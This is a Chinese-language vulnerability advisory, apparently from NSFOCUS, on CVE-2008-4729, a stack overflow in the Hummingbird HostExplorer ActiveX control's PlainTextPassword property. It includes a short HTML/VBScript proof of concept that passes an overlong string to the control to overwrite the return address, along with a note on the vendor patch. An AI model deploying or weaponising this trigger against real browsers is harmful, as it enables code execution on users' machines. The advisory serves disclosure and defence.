安全研究
安全漏洞
Hummingbird HostExplorer ActiveX控件PlainTextPassword属性栈溢出漏洞
发布日期:2008-10-16
更新日期:2008-10-21
受影响系统:Hummingbird HostExplorer 8.0
Hummingbird HostExplorer 6.2
不受影响系统:Hummingbird HostExplorer 13.0
描述:
BUGTRAQ ID:
31783
CVE(CAN) ID:
CVE-2008-4729
Hummingbird HostExplorer是PC到主机和Web到主机的终端模拟解决方案,允许从用户桌面连接到企业主机。
Hummingbird.XWebHostCtrl.1 ActiveX控件(hclxweb.dll)在处理PlainTextPassword属性时存在栈溢出漏洞。如果用户受骗访问了恶意站点并向受影响的属性传送了超长的字符串参数的话,就可以触发这个溢出,导致执行任意指令。
<*来源:Thomas Pollet
链接:
http://secunia.com/advisories/32319/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<!--
the latest version of this activex (13.0) is compiled with /gs, earlier versions aren't.
The XXXX would have overwritten return address.
by
thomas.pollet@gmail.com
-->
<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1
</script>
</html>
建议:
厂商补丁:
Hummingbird
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.hummingbird.com/浏览次数:2817
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |